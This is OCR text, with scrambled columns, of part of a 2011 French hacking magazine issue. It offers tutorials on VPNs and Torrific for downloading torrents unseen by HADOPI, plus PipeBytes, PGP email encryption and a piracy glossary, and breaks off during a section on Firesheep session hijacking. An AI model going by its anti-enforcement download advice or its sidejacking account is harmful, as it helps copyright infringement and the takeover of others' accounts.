PIRATE LES CAHIERS DU HACKER

inf rmatique

PIRATE
inf rmatique NOUVELLE
N 08

FORMULE !
AVEC CD

BEST OF 2011
GRATUIT
> PLUS DE PAGES E
T
GUIDE 100%
PRATIQUE !

PIRATAGE
TOUS LES OUTILS
TOUS LES TUTORIELS

HACKING / ANONYMAT
SURVEILLANCE / MULTIMDIA /...
COMMENT A MARCHE [ ? ]
DIABOLIQUE ANONYMAT MULTIMDIA
Ultra-rapide : un Coment utiliser Coment dbrider
aspirateur de mots facilement un MegaUpload et
de passe sur cl usb VPN pour le P2P MegaVideo
 ANONYMAT SOMMAIRE
6-7
HADOPI MENACE :
passez par un VPN !

8
PIPESBYTES : transferts de chiers
scuriss

9-11
CRYPTEZ VOS EMAILS AVEC OPENPGP
12
TORRIFIC permet de tlcharger des
Torrents sans veiller les soupons dHADOPI
Les premiers mails davertissement
sont dans les tuyaux ! Des milliers
dinternautes franais vont enfin
bnficier des remontrances de Hadopi 9

HACKING

14-15
FIRESHEEP ET LE
SIDEJACKING : piratage
de compte la vole

16-17
UN ASPIRATEUR DE
MOT DE PASSE FAIT
MAISON
14

24 18-20
SE PROTGER DU MAILBOMBING

22-23
LE BLUETOOTH EN DANGER : se protger
et samuser

Le jailbreak consiste
outrepasser les
24-25
restrictions du systme LES DRM DES EBOOKS : comment sen
dbarrasser ?
dexploitation dApple
26-28
VIRUS GUARD : lantivirus pour BitTorrent

2
 LES CAHIERS DU HACKER

PROTECTION PIRATE
inf rmatique
28-29 N8 Fev / Avr 2011
BACKUP : Sauvegardez votre Une publication du groupe ID Presse.
27, bd Charles Moretti - 13014 Marseille
systme (avant quil ne soit trop E-mail : redaction@idpresse.com
tard) !
Directeur de la publication :

30-31 David Cme

Rdacteur en chef :
Benot Bailleul
Quand rien ne va plus, faites appel
Rdacteurs :
BITDEFENDER RESCUE CD
Virginie Ratto, Michal Couvret

32-33 Maquettiste :
Sergei Afanasiuk
LES ROGUES, CES FAUX Secrtaire :
Karima Allali
ANTIVIRUS...
Imprim par / Printed by :

MULTIMDIA 40-42 ROTIMPRES - C/ Pla de l'Estany s/n

Pol. Industrial Casa Nova
17181 Aiguaviva - Espagne
POCKET DIVX ENCODER :
34-36 Lencodage vido facile sur
tous supports !
Distribution : MLP
COUPEZ COURT AUX Dpt lgal : parution
Commission paritaire : en cours
RESTRICTIONS de MICRO FICHES ISSN : 1969-0827
MegaUpload et MegaVideo
avec AllDebrid et Cacaoweb
44-49 Pirate Informatique est dit
par SARL ID Presse, RCS : Marseille 491 497 665

37
Capital social : 2000,00
100% MICROFICHES : Parution : 4 numros par an.
> Les meilleures astuces La reproduction, mme partielle, des articles et
ISOBUDDY jongle avec les de la rdaction illustrations parues dans Pirate Informatique
chiers images est interdite. Copyrights et tous droits rservs
ID Presse. La rdaction nest pas responsable
SPCIAL ESPION
38
des textes et photos communiqus. Sauf accord

50-51
particulier, les manuscrits, photos et dessins
adresss la rdaction ne sont ni rendus ni
renvoys. Les indications de prix et dadresses
CAMSTUDIO enregistre le > Notre slection de
figurant dans les pages rdactionnelles sont
donnes titre dinformation, sans aucun but
stream la vole ! matriels + NOTRE TEST publicitaire.

dito
La nouvelle version de Pirate Informatique
vous a sduite et nous en somme ravis. Pour
ce nouveau numro, nous avons une nouvelle
fois essay de vous proposer les meilleurs
trucs et astuces. Quil sagisse de scurit, de
multimdia, danonymat et bien sr de hacking,
nous vous expliquons tout et nous vous donnons
toutes les pistes pour aller plus loin : protection
de compte, rcupration de mots de passe, hack
bluetooth, dverrouiller les DRM, crypter ses
e-mails et bien dautres cas pratiques...
Toutes nos amitis Lucette, notre plus dle
lectrice ! Comme dhabitude, il va falloir mettre
les mains dans le cambouis (en vitant de
laisser des traces...) ! Toutes nos amitis
Lucette, notre plus dle lectrice ! Nhsitez
pas nous faire part de vos commentaires et de
vos souhaits pour les prochaines ditions sur
redaction@idpresse.com
Benot Bailleul

3
RSULTATS

GRAND Quel que soit lusage que

CONCOURS vous faites de votre ordinateur

et dinternet, BitDefender
protge votre systme et vos
donnes personnelles. Avec
BitDefender Internet Security
2011 votre monde numrique
est protg.

Avec BitDefender Internet

Security 2011 surfez en
toute scurit pendant :
2 ANS sur 3 PC !
- Antivirus
- Antispyware
- Antiphishing
- Antispam
- Pare-feu
- Contrle Parental
- Gestion du rseau personnel
- Mode GAMER
- Mode PC portable

Bravo nos 30 gagnants !

Ils gagnent tous une licence de BitDefender Internet Security 2011
dune valeur de 39,95
Florian M. (25) Charly P. (37) Sylvain D. (14)
Nathalie A. (46) Bndicte E. (70) Rgis S. (54)
Carole B. (11) Christian G. (50) Andre C. (52)
Jean-Philippe S. (37) Fabrice P. (38) Mireille B. (27)
Jacky O. (14) Laurence P. (79) Cdric L. (76)
Patrick V. (27) Pierrick B. (06) Brice M. (75)
Delphine V. (18) Christophe G. (84) David B. (93)
Frdric B. (44) Caroline G. (41) Simon L. (65)
Emilie H. (44) Franck B. (91) Virginie L. (32)
Sandrine P. (67) Khadidja S. (93) Sbastien L. (05)
Appz : Terme dsignant des applications pirates, vient
de lassociation entre application et warez, il
existe aussi gamez, isoz, romz, serialz, etc. faire saturer.
Backup : Il sagit dune sauvegarde dun systme, dun
pan entier dun ordinateur ou de donnes spcifiques que
lon met labri pour viter de les perdre.
Brute force : Mthode consistant essayer tous les
mots de passe jusqu tomber sur le bon. Cest un
logiciel (cracker) qui va faire le sale boulot pour
lutilisateur.
Coder : Dans le petit monde des hackers, le coder est
en charge de la programmation (code). Il peut casser des
protections, crer des logiciels, des intros, dmos,
etc.
Crack : Petit programme qui permet de se passer de la
phase denregistrement du produit pour viter de passer
la caisse. Il sagit gnralement dun fichier EXE que
lon doit substituer un lEXE officiel.
Crasher : Cest un pirate qui dtruit pour le plaisir.
Il utilise des virus pour immobiliser sa cible et il
efface, casse o rend inoprant. Personnage trs mal vu
dans le milieu.
DRM : Il sagit dun verrou numrique appliqu sur
un fichier musical, vido ou un ebook qui restreint
lutilisation pour viter le piratage.
Encodage : Il sagit de modifier un fichier multimdia
brut afin de le rduire (DivX) ou de le rendre lisible
sur un autre support (MP4, 3GP, etc.)
Exploit : Un exploit est un lment de programme
permettant un individu ou un logiciel malveillant
dexploiter une faille de scurit dans un OS, un
logiciel ou un jeu.
Fichier image : Cest un fichier, prt tre grav,
qui contient toutes sortes dinformations destines
tre sauvegard. Windows ne peut pas lire ce type de
fichier en ltat mais des logiciels comme Daemon Tools
ou Alcool 100% lautorisent.
Homebrew :
Littralement brass la maison, il sagit en fait VPN : Virtual Private Network ou rseau priv
dun programme (la plupart du temps, des jeux) fait
la maison avec ou sans autorisation des ayants droit.
Il existe par exemple de nombreux jeux homebrew sur Wii,
Game Boy Advence, PSP, etc.
Jailbreak : Opration qui consiste trafiquer le
systme dexploitation dun appareil pour avoir accs
des paramtrages indits. Le jailbreak de liPhone
permet par exemple de modifier le thme ou dinstaller
des applications non signes.
Keygen : Mot-valise pour key et generator. Cest
un programme qui va gnrer une cl dactivation valide
pour un logiciel donn. Gnralement ralis par
un coder qui aura utilis une technique de reverse
engineering.
Keylogger : Programme permettant discrtement
denregistrer les frappes au clavier en vue
despionner ou de subtiliser des mots
de passe.
Mailbombing : Technique consistant bombarder demail
le serveur dun utilisateur ou dune entreprise pour le
Proxy : Ou serveur mandataire en franais. Cest un
serveur qui fait tampon entre un utilisateur et un rseau
(le plus souvent Internet). Frquemment utilis pour
passer inaperu sur le Net ou pour viter de voir son
adresse crit en clair.
Rip : Procd qui consiste capturer le flux audio
et vido des supports disque (DVD, Blu-ray). Une fois
extrait le fichier ripp, brut, est prt tre encod.
Rogue : Les rogues sont de faux antivirus qui vous font
croire une contamination dans le but de vous escroquer.
RSA : Il sagit dun algorithme de cryptographie
asymtrique invent par Rivest, Shamir et Adleman. Trs
utilis dans le commerce lectronique ou les changes
de donnes confidentielles, cet algorithme est bas sur
lutilisation dune publique pour chiffrer et dune cl
prive pour dchiffrer.
Seedbox : Une seedbox est un serveur distant qui va
tlcharger votre place des donnes sur le rseau P2P
pour ensuite vous le dlivrer via le classique (et non
surveill) protocole HTTP.
Script Kiddies : Cest un pirate qui utilise des
logiciels de piratage sans vraiment en connatre le
fonctionnement pour se faire mousser ou raliser des
mfaits.
Serialz : Il sagit dun code dactivation pour un
logiciel ou un jeu qui a t gnr par un keygen ou qui
a t vol.
Sidejacking : Il sagit dune technique qui permet
de prendre possession dun compte conjointement
avec lutilisateur lgitime.
Stream : Le stream est une technique qui consiste
diffuser de laudio ou de la vido partir dune
simple page Internet. Il nest donc pas ncessaire
de tlcharger quoique ce soit, la lecture
se faisant au fur et mesure que les donnes
arrivent.
virtuel. Il sagit dune connexion scurise entre
ordinateur via Internet. Le but est de recrer en
ligne le mme fonctionnement quun rseau local.
Chiffr, personne ne peut savoir ce qui passe par
les postes des utilisateurs connects.
Warez : Ce terme dsigne des contenus numriques
protgs par copyright diffus illgalement. De
manire gnrale, la diffusion de contenus
numriques affichant le terme warez
a une connotation de pratique
illgale.
IQUE
LEX
5
 HADOPI menace :
Nombreux sont les Internautes
qui souhaitent protger leur
vie prive et par la mme
occasion, leurs changes de
fichiers. Parmi les solutions
permettant de devenir anonyme
sur la Toile, il existe les VPN.
Sorte de proxy de seconde
gnration, ces rseaux privs
virtuels deviennent peu peu
les chouchous des P2Pistes.
Voyons ce que propose cette
technologie et comment y
accder
Quels OS ?
Le tutoriel que nous vous proposons est
valable pour Windows Vista mais IPjetable
fonctionne aussi trs bien avec Windows
XP, Windows 7, MacOS X, la distribution
Linux Ubuntu, et mme les iPhone 3 et
4 ! Vous trouverez les tutoriels pour vous
connecter au VPN depuis votre appareil
cette adresse : http://ipjetable.net/
aidefaq.php
Attention !
Certains modem-cble ou box
(comme celle de Numericable, par
exemple) bloquent les VPN. Suivez les
instructions au dos de votre matriel
pour vous connecter sur linterface
dadministration de celui-ci. En gnral,
il suffit de rentrer une adresse du type
http://192.168.0.1 dans votre
navigateur. Il faudra ensuite trouver une
case cocher (VPN passthrough ou
PPTP passthrough) puis valider avant
de redmarrer votre modem.
PASSEZ PAR
UN VPN !
U
n VPN (pour Virtual Private ment Ipodah) car il permet de lessayer
Network) permet de recrer pendant deux jours sans mme sortir
en ligne via Internet, le mme votre carte bleue ! Si vous tes satisfait
fonctionnement quun rseau du rsultat, il suffira de vous abonner
local (o au moins deux ordinateurs sont pour 15 /mois. Cr en mai 2009 au
relis physiquement avec des cbles moment o la loi HADOPI tait dbattue
rseaux). lAssemble Nationale, IPjetable utilise
Pour profiter de cette technologie, il suffit le protocole PPTP pour ses changes
de sabonner un service spcial donnant et vous fournit une adresse IP au Pays-
laccs au rseau (voir notre pas pas). Bas. Comme cette dernire est situe
Une fois que votre connexion Internet ltranger, elle nexiste tout simplement
passe par ce VPN, tous vos changes de pas pour les robots qui surveillent le
donnes sont crypts et, avec certains Net Il ny a rien installer puisque Win-
services, vous disposez mme dune nou- dows fournit le client PPTP. En plus de ce
velle IP. Il est donc possible de tlcharger changement dIP, la communication est
via BitTorrent ou eMule sans craindre les chiffre entre lutilisateur et la plateforme
foudres dHADOPI puisque personne ne dIPjetable (qui ne garde aucun journal
peut savoir ce quun internaute fait au de connexion). Nous insistons bien sur
sein du rseau. le fait quavec ce type de service, ce sont
bien tout les types dchange qui sont
Ipodah est mort, vive IPjetable crypts et pas seulement le surf comme
Parmi les VPN qui fleurissent sur la Toile, cest le cas avec les sites crans (comme
nous avons test IPjetable (ancienne- www.youhide.com, par exemple).
PRATIQUE Check my Torrent
Quand on veut tre absolument sr que son systme danonymisation (VPN, proxy ou
autre) fonctionne bien avec BitTorrent, il existe un moyen trs simple : le site Check my
Torrent IP. Ce dernier se charge de veiller ce que vos scurits soient bien actives
1 Le Torrent test
Allez sur le site de Check my Torrent IP et
cliquez sur le bouton Generate Tracking
Torrent. Vous tlchargerez alors un Torrent
test qui va indiquer au site votre IP toutes
les 60 secondes.
6
 ANONYMAT HACKING PROTECTION MULTIMDIA MICRO FICHES
RSEAU PRIV VIRTUEL

PRATIQUE Vous connecter IPjetable

1 Les identifiants
Pour recevoir vos identifiants, allez sur la
page Internet dIPjetable puis cliquez sur
Inscription. Cliquez sur le lien que vous
recevrez pour activer votre compte. Ensuite,
crer une nouvelle connexion puis validez.
Choisissez ensuite Utiliser ma connexion
Internet (VPN) et rentrez pptp.ipjetable.
net dans le champ Adresse Internet. En ce
qui concerne le nom de la connexion, tapez
IPjetable.
3 Une scurit
Aprs avoir valid, on vous demandera de
taper votre nom dutilisateur et le mot de
passe que vous avez reu par e-mail. Pour
plus de facilit, cochez la case Mmoriser
double-cliquer sur les icnes en forme
dcran en bas droite de votre bureau (prs
de lhorloge) puis de slectionner IPjetable.
Pour vous reconnecter, cliquez sur le menu
Dmarrer, Connexion et choisissez IPjetable
dans Accs distance et VPN (menu drou-
lant Afficher). Si vous voulez vrifier que
vous tes protg, il suffit daller faire un tour
sur la page Internet dIPjetable o un mes-
sage rassurant devrait tre affich. Vous pou-
vez aussi vous rendre cette adresse (www.
mon-ip.com) pour constater que la machine
vous situe bien au Pays-Bas !

sous Vista, allez dans le menu Dmarrer

puis Connexion et enfin sur Configurer une
connexion ou un rseau. Slectionnez Con-
nexion votre espace de travail et cliquez
sur Suivant.

2 La nouvelle connexion
la question Voulez-vous utiliser une con-
nexion dj existante ?, slectionnez Non,
ce mot de passe puis cliquez sur Connecter.
Une fois la connexion tablie, Windows vous
demandera de dfinir lemplacement du CE QU'IL VOUS FAUT
rseau IPjetable. Slectionnez Lieu public > IPJetable
pour une scurit plus solide.
http://ipjetable.net
> Check my torrent IP
4 Une nouvelle IP ! http://checkmytorrentip.com
Pour vous dconnecter, lorsque vous ne
tlchargez plus par exemple, il suffit de DIFFICULT

IP : tre sr de son VPN !

2 Les informations qui filtrent 3 Plusieurs IP
Placer ce Torrent dans votre client habituel (ici Torrent) et Il est bien sr possi-
dmarrez le tlchargement. Au bout dune minute, cliquez sur ble davoir plusieurs
Refresh en bas de la page Check my Torrent IP pour voir les entres si vous dci-
informations que le site a en sa possession. dez de voir ce qui se
passe lorsque vous
activez/dsactivez vo-
tre protection. Sur no-
tre photo ci contre, on
peut voir deux IP diff-
rentes qui sont enre-
gistres partir dun
seul ordinateur deux
moments diffrents.

7
 ANONYMAT HACKING PROTECTION MULTIMDIA MICRO FICHES
DE PEER PEER

PipeBytes : transfert
de fichiers scuris
Ge.tt, lalternative
Ge.tt convient plusieurs types dutilisa-
teurs : les P2Pistes qui veulent partager
en priv ou les internautes qui veulent
senvoyer de gros fichiers sans les parti-
tionner. Ce service permet de mettre en
Les sites qui proposent de partager des fichiers sur un serveur distant ne
manquent pas sur la Toile. PipeBytes innove pourtant puisquavec ce service
gratuit les fichiers peuvent tre tlchargs pendant quils sont envoys : le
serveur fait ici office de tampon et comme la connexion est crypte, personne ne
sait ce que vous faites ou transfrez. Explications

partage un fichier dun simple clic et ce,
sans limite de taille. Il suffit de choisir
son fichier, de cliquer pour lenvoyer vers
les serveurs de Ge.tt et le site gnrera
une URL valable 30 jours. Celle-ci peut
tre envoye vers votre page Facebook,
votre compte Twitter ou votre e-mail.
http://ge.tt
CE QU'IL VOUS FAUT
> PipeBytes (gratuit)
http://host01.pipebytes.com
DIFFICULT
P
ipeBytes permet de mettre
en relation deux personnes
afin dautoriser un transfert
de fichier. Non seulement le
systme ne requiert pas dinscription
mais il ne requiert pas dupload en
tant que tel. Vous nenvoyez que les
informations concernant le fichier et
son emplacement. Aprs avoir choisi
votre fichier, PipeBytes gnre un lien
(ou un code saisir sur la page du
service) que votre correspondant
utilisera pour rcuprer le fichier
directement sur votre ordinateur. Bien
sr, il na pas de limite de taille et cela
fonctionne avec tous les navigateurs :
Internet Explorer, Firefox, Opera et
Safari. Cerise sur le gteau, le transfert
est crypt avec la norme SSL (celle qui
scurise les donnes bancaires).
Personne ne peut donc savoir ce qui
transite entre vous et votre correspon-
dant. Il est aussi possible dajouter un
Widget sur votre blog ou site pour
permettre vos visiteurs de schan-
ger des fichiers en toute transparence
et gratuitement. Seuls points noirs : on
ne peut partager quavec une seule
personne la fois et si vous quittez la
page de PipeBytes pendant un
transfert, le tlchargement de votre
ami sera interrompu.

PRATIQUE Partagez en mode scuris !

1 Le lien
Sur la page principale du site dans la partie
Send, cliquez sur Parcourir pour trouver le
fichier que vous voulez envoyer. Ajouter quel-
ques mots pour le dcrire dans Message et
2 Le transfert
Sur cette nouvelle page, vous verrez le
lien ou le code envoyer votre ami (par
cliquant sur le lien, ce dernier va alors initia-
liser le transfert. Veillez rester connecter au
site durant le processus.
3 Sur votre site/blog
Sur la page principale, cliquez sur le mot
Widget dans la liste des fonctionnalits. Choi-
sissez Basic Widget ( moins de savoir ce que
vous faites en choisissant loption Custom)
et copier-coller le code gnr dans le code
HTML de votre site ou blog. Il ny a rien de plus
simple ! Maintenant, vos visiteurs pourront uti-
liser ce service de votre page.

slectionnez denvoyer une URL (le correspon-
dant naura qu cliquer dessus) ou un code
(il faudra que votre ami se rende sur la page
de PipeBytes). Cliquez enfin sur le bouton
Send File.
e-mail ou mieux, par messagerie instan-
tane) : http://host01.pipebytes.com/
get.php?key=101100194553867. Waiting
for recipient signifie que le service attend
que votre correspondant se manifeste. En

8
 ANONYMAT HACKING
CHIFFREMENT
Cryptez
vos
e-mails !
Pour votre correspondance
professionnelle ou juste pour ajouter
une protection supplmentaire, il
est possible de crypter (ou plutt
chiffrer) vos e-mails. Avec un simple
client comme Thunderbird, SeaMonkey
ou Eudora, recevez et envoyez du
courrier lectronique indchiffrable,
mme par larme !
S
ans verser dans la paranoa, le
courrier que vous envoyez par
e-mail peut tre intercept, lu
et dtourn. Si la plupart de
vos emails sadressent la famille, pas
de problme mais si vous utilisez votre
compte pour le travail cela devient
problmatique. Pourquoi ne pas
carrment chiffrer vos e-mails ? Radical
mais tellement plus sr
PGP, un symbole
Pour ce faire, nous vous proposons
dutiliser le trio Thunderbird (le client
e-mail), Enigmail (un simple plugin)
et GnuPG. Ce dernier est une version
libre du clbre logiciel de chiffrement
et de signature PGP. Utilisant une
PROTECTION MULTIMDIA MICRO FICHES
La carte postale
Les pros de la scurit aiment comparer
le-mail une carte postal. En effet, vous
ncrivez rien de sensible sur une carte
postale puisque tout le monde peut voir
ce que vous crivez. Pour les e-mails,
cest la mme chose. Si vous crivez des
informations dans un e-mail que vous
ncririez pas sur une carte postale, mieux
vaut chiffrer votre correspondance !
Gmail ou Hotmail ?
Il nest malheureusement pas possible
dutiliser Enigmail avec vos webmails.
Pour continuer utiliser ces comptes et
recevoir de la correspondance chiffre,
il va falloir migrer votre compte vers un
client comme Thunderbird. Gmail ou
Hotmail proposent des solutions
www.arobase.org/thunderbird/
relever-boite-gmail-thunderbird.htm
www.arobase.org/thunderbird/
relever-boite-hotmail-
thunderbird.htm
Phil Zimmermann
la dit
Si lintimit est mise hors la loi, seuls
les hors-la-loi auront une intimit
Les agences de renseignement, les
trafiquants darmes et de drogue
ont accs une bonne technologie
cryptographique mais les gens ordinaires
ny avaient pour la plupart pas accs
9
cryptographie asymtrique, ce logiciel
a beaucoup fait parler de lui dans les
annes 90 puisque Phil Zimmerman,
son crateur, a t poursuivi au tats-
A Hello Hello
Unis pour avoir viol le Arms Export Anatole Anatole
Control Act. Il faut dire quoutre- A A
Atlantique, les logiciels de chiffrement A
offrant un algorithme trop puissant WhgfO WhgfO
VzWYs$j VzWYs$j A
sont considrs comme des armes. Anatole a cr ses deux cls, lune
Rachet par Symantec, PGP nest publique et lautre prive. Il envoie
malheureusement plus gratuit, nous la premire Benjamin et garde bien Pour envoyer un message Anatole, Benjamin va le chiffrer
avons donc choisi de vous proposer prcieusement la deuxime en utilisant sa cl prive et la cl publique dAnatole (pour
GnuPG. que seul ce dernier puisse le lire). Pour le dchiffrer, Anatole
utilisera sa cl prive.

PRATIQUE OpenPGP dans Thunderbird

1 Linstallation
Commencez par installer le logiciel Thunderbird puis sur la page de tlcharge-
ment dEnigmail, choisissez la version qui convient en fonction de votre systme
dexploitation et du logiciel de messagerie (ici Thunderbird 2.0). Dans le client,
allez dans le menu Outils>Modules complmentaires puis cliquez sur Installer
Cherchez le fichier .XPI dEnigmail. Thunderbird devrait vous demander de red-
marrer. Profiter de cette pause pour installer GnuPG (sans changer le rpertoire
de destination).
2 LAssistant
Vous avez maintenant un menu OpenPGP dans Thunderbird. Faites
OpenPGP>Prfrences pour obtenir lassistant. Ici vous devrez choisir de confi-
gurer OpenPGP pour toutes les identits ou de les slectionner la main. Ensuite,
choisissez ou non de signer vos messages. Il sagit en fait de signer numrique-
ment vos e-mails pour que vos correspondants aient la possibilit de savoir sils
viennent bien de vous (si votre ami dispose dun client compatible OpenPGP ou
PGP). Vous pouvez bien sr choisir des rgles pour que certains destinataires reoi-
vent des mails signs et dautres non. Ensuite, lassistant va vous demander si
vous voulez chiffrer vos messages par dfaut ou pas. moins dtre absolument
sr que tous vos amis aient un client compatible avec PGP, nous vous conseillons
de choisir la deuxime option. LorsquEnigmail vous demandera enfin si le logiciel
peut changer quelques paramtres de messagerie, dites Oui.

3 Les cls
Il est temps de crer votre paire de cls. Choisissez votre compte email dans la
liste droulante puis tapez deux fois une phrase secrte. Notez que ces cls

10
 ANONYMAT HACKING PROTECTION MULTIMDIA MICRO FICHES
CHIFFREMENT

Double cls ? la lettre et ferme le coffre (sans CE QU'IL VOUS FAUT

La cryptographie asymtrique se
base sur lutilisation de deux cls.
Ces dernires ne sont que des suites
de nombres et de chiffres permettant
de chiffrer et dchiffrer les messages.
Les messages chiffrs sont illisibles
et ressemblent aussi des suites
dsordonnes de caractres. On peut
comparer le fonctionnement asym-
trique une sorte de coffre-fort. A
envoie un coffre-fort B pour quil
puisse y mettre une lettre. B dpose
avoir besoin de cl). Seul A pourra
ouvrir le coffre. Ici le coffre cest la > Mozilla Thunderbird
cl publique, celle que vous devrez www.mozillamessaging.com/fr/
envoyer tous vos destinataires Un thunderbird/
message chiffr avec une clef prive > Enigmail
ne peut tre dchiffr quavec la clef http://enigmail.mozdev.org/
publique du couple, et vice-versa. download/index.php.html
Il est bien sr impossible partir > GnuPG
de la clef publique de retrouver la ftp://ftp.gnupg.org/gcrypt/binary/
clef prive. Avec ce systme, il est gnupg-w32cli-1.4.9.exe
extrmement complexe de parvenir
briser le chiffrement. DIFFICULT

2048 bits sont valables 5 ans. Une fois vos cls cres, le logiciel vous demande
si vous dsirez crer un certificat de rvocation au cas o vos cls prives soient
exposes. Attention, ce certificat doit tre mis en lieu sr car si quelquun le
trouve, il peut rvoquer votre cl prive
Une fois lassistant ferm, cest enfin la page des Prfrences qui va safficher.
presse-papiers (copier) pour ensuite la coller dans un logiciel de messagerie
instantane ou autre. Vous pouvez aussi faire Ecrire>OpenPGP>Attacher ma
cl publique.
5 Votre trousseau
Votre correspondant et vous devrez suivre la mme procdure pour importer vos
cls publiques respectives. Slectionnez et ouvrez le message comprenant la cl
publique de votre correspondant. Cliquez ensuite sur Dchiffrer. Le logiciel va
alors dtecter la cl publique et vous proposera de limporter votre trousseau.

vitez le mode Expert dans un premier temps (rien ne vous empche dy jeter Sachez que pour tre sr que la cl vous a bien t envoye par la personne
un coup dil) mais vrifier bien quEnigmail a trouv lemplacement de GnuPG que vous croyez, il est possible de la signer. Signer une cl publique est un bon
puis cliquez sur Ok. moyen de la faire valider.

4 Envoyer sa cl publique 6 Chiffrer/dchiffrer

Il est ensuite temps denvoyer votre cl publique aux destinataires possdant
aussi PGP. Allez dans OpenPGP>Gestions de clefs puis cochez la case Afficher
toutes les clefs par dfaut. Faites un clic droit dans la ligne qui vient de saf-
ficher et choisissez denvoyer votre cl publique par email ou placer l dans le
Lorsque votre correspondant et vous aurez russi importer et valider vos
cls publiques respectives, il est temps de passer laction. Pour chiffrer un
message, cliquez sur le bouton crire pour rdiger un nouveau message puis
sur licne OpenPGP pour afficher la fentre de Chiffrement OpenPGP. Cochez
la case Chiffrer le message (il est aussi possible de signer le message mais ce
nest pas obligatoire) et cliquez sur Ok. Il ne vous reste plus qu lenvoyer et
taper votre phrase secrte pour quEnigmail crypte votre message. Pour dcryp-
ter un message entrant, il suffit de louvrir et de saisir votre phrase secrte.

11
 ANONYMAT HACKING PROTECTION MULTIMDIA MICRO FICHES
BITTORENT

TORRIFIC :
Il tlcharge pour vous !

Une solution alternative
bluffante pour garantir
son anonymat et
tellement simple :
le service en ligne
Torrific tlcharge pour
vous ! Bas ltranger,
cest son serveur
qui se connecte
BitTorrent. Vous restez
compltement invisible.
Et cest gratuit !
U
ne page daccueil minimaliste,
un peu sur le modle de
Google : aucun logiciel installer,
tout se fait en ligne. Vous copier
le lien du fichier Torrent qui vous intresse
dans lespace de recherche et Torrific se
charge de le rapatrier pour vous. Cest lui
qui se connecte au rseau, votre adresse
IP nest jamais visible car lorsque vous
rcuprez ce mme fichier sur votre disque
dur, cest depuis les serveurs de Torrific, en
tlchargement direct ! Pas de problme
avec HADOPI donc.
Une seedbox gratuite !
Nous ne savons pas comment Torrific finance
ses serveurs (o sont hbergs tous les
torrents tlchargs par les utilisateurs),
peut-tre grce au service Premium
quil propose pour 10 $ et qui est cens
augmenter la qualit du service (vitesse
de tlchargement accrue). Mais pour
avoir test sa version gratuite, qui
donne entire satisfaction, nous nen
voyons pas lintrt.

PRATIQUE Tlchargez via Torrific

1 Inscription
Torrific est gratuit mais vous devez vous enreg-
istrer en ligne. Cest sur votre email que vous
serez prvenu de la fin dun tlchargement.
ses serveurs. Quand il aura termin, il vous Ici, nous avons par exemple cliqu sur le
prviendra par mail. Vous naurez alors plus premier lien propos (Isohunt). Cette fois-ci,
qu le rapatrier sur votre ordinateur en t-
lchargement direct !

Torrific nous prvient que ce fichier est dj

2 Trouvez torrent
En vous rendant sur vos sites de tlcharge-
ment favoris, trouvez le torrent de vos rves
puis faites un clic droit sur le lien de t-
lchargement. Choisissez Copier ladresse
du lien. Collez ensuite ce lien sur Torrific et
cliquez sur Get. Le service vous permet de
vrifier ce qui sera rcupr tout en lanant
en parallle le tlchargement de ce lien sur
prsent sur leur serveur (un internaute la dj
tlcharg avant vous). Vous navez mme
pas besoin dattendre : vous pouvez lancer
le tlchargement direct immdiatement en
3 Autre mthode cliquant sur le fichier !
Pour les plus fainants, recherchez vos
torrents depuis Torrific ! Tapez dans lespace
de recherche le nom du fichier souhait et
le service vous propose tous les rsultats
trouvs sur Google et qui ne concernent
que des liens Torrents. Votre navigation est
masque car vous passez par le Proxy de
Torrific. Vous pouvez mme surfer sur vos
sites prfrs en utilisant ce proxy.
CE QU'IL VOUS FAUT
> Torrific (gratuit)
www.torrific.com

DIFFICULT

12
LE 1 MAGAZINE BITTORRENT
ER

EN KIOSQUE

Lavenir du numrique chez votre

marchand de journaux
 Firesheep pirate
Firesheep, un nouveau plugin
pour Firefox, a beaucoup fait
parler de lui le mois dernier. Il
sagit dun programme qui ouvre
un compte
sur votre PC tout compte Face-
book, Twitter, Windows Live, etc.
condition que le propritaire
sans les identifiants
de ce dernier soit connect au
mme accs Internet que vous (
la maison, au bureau, etc.)

Pas un outil destin

pirater...
Attention, seuls les mots de passe que
vous avez choisi denregistrer sur votre or-
dinateur seront restorables (gnralement
en cochant la case Se souvenir de moi
ou Se souvenir de mes identifiants). Pour
viter de se faire piger par des pirates
la petite semaine, souvenez-vous vous-
mme de vos identifiants !

Un piratage light
Ce procd ne permet pas de voler des
mots de passe, il fait juste croire au site
que le mot de passe a dj t tap

pralablement. Il nest pas non plus pos-
sible de saccaparer un compte puisque
pour un changement du mot de passe, la
plupart des sites disposent de protections
permettant de se mettre labri (retape
du mot de passe pour la saisie du nou-
veau. Lutilisateur rentre simplement dans
le compte quil cible comme sil tait
son propritaire. Attention cependant au
piratage de votre messagerie qui pourrait
savrer dvastateur...
Encore plus
dangereux !
Firesheep ne permet pas de pirater une
connexion WiFi, il autorise simplement la
rcupration de donnes sur un rseau
ouvert. Rien nempche cependant les
individus malintentionns de pirater un
rseau WiFi pour ensuite se servir de
Firesheep. Un petit malin lextrieur de
chez vous (ou dans lappartement d
ct) pourra alors tranquillement usurper
votre identit... Protgez votre rseau sans
fil avec une cl WPA-II
D
velopp par Eric Butler et site ou usurper une identit devient
prsent lors dune grande alors un jeu denfant pour des millions
confrence sur le hacking de script kiddies en manque de
San Diego, Firesheep a fait sensations. Cela peut aussi tre utile
leffet dune bombe lors de sa mise pour des raisons beaucoup plus loua-
disposition sur Internet. Ce sniffer va bles et lgales.
en fait capturer la vole les cookies
de connexion dautres utilisateurs Se protger !
connects au mme point daccs Pour se protger, il faut viter les points
WiFi. Sil est mal scuris ou sil sagit daccs WiFi ouverts et scuriser son
dun rseau dentreprises, dun hotspot accs la maison (en mettant une cl
ouvert ou dun rseau familial, la pche WPA-II au lieu des cls WEP crackable
peut savrer trs fructueuse ! Sans en un tour de main). Mais le problme
aucune relle intervention ou connais- vient aussi des sites. Tant quils
sance en hacking, lutilisateur peut alors nauront pas chang leur manire de
se retrouver avec un accs au compte communiquer avec leurs utilisateurs, il
de toutes les personnes connectes au faudra passer par des outils permettant
mme rseau Internet que lui et ayant dutiliser en permanencele cryptage
ouvert une cession Amazon, Google, SSL (comme HTTPS-Everywhere et
Windows Live, Facebook, Twitter, Flickr, Force-TLS, des extensions Firefox qui
Wordpress, Yahoo, etc. Il lui suffit alors permettent un cryptage de toutes les
de cliquer dessus pour se retrouver donnes qui transitent entre un site et
connect lui aussi sur ce compte ! votre PC). Cest encore lutilisateur de
Prendre possession dun compte, dun sy coller...

14
 ANONYMAT HACKING PROTECTION MULTIMDIA MICRO FICHES
PIRATAGE

PRATIQUE Nous avons

test FIRESHEEP
1 Linstallation 3 Test compte complice
